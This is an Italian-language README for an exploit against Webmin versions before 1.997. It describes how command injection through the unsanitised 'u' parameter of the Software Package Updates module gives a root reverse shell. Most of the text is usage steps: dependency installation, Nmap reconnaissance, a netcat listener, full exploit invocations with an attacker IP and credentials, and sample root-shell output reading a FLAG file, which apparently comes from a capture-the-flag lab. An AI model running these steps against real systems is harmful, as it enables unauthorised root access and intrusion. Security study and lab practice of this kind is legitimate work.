
Exploit di remote code execution autenticato per Webmin < 1.997 tramite il modulo Software Package Updates. Inietta comandi arbitrari come root attraverso un parametro non sanificato, fornendo una reverse shell.
Exploit per la vulnerabilità di Remote Code Execution in Webmin versioni precedenti a 1.997, attraverso il modulo Software Package Updates.
Il modulo Software Package Updates di Webmin non sanifica correttamente il parametro u prima di passarlo al sistema. Un utente autenticato con accesso a quel modulo può iniettare comandi arbitrari che vengono eseguiti come root.
Installa le dipendenze prima di eseguire l'exploit:
pip3 install requests beautifulsoup4 lxml urllib3
| Parametro | Descrizione | Esempio |
|---|
-t | URL del target (senza porta) | https://192.168.1.10 |
-u | Utente di Webmin | admin |
-p | Password di Webmin | password123 |
-l | La tua IP (dove ricevi la shell) | 192.168.1.5 |
-lp | Porta su cui ascolti | 4444 |
1 — Identifica l'IP del target con Nmap:
nmap -sV TARGET_IP
# Cerca la porta 10000 con Webmin
2 — Apri il listener sulla tua macchina:
nc -lvnp 4444
3 — In un'altra finestra di terminale, esegui l'exploit:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — Se l'exploit ha successo vedrai:
5 — Nel listener riceverai una shell come root:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminale 1
nc -lvnp 4444
# Terminale 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444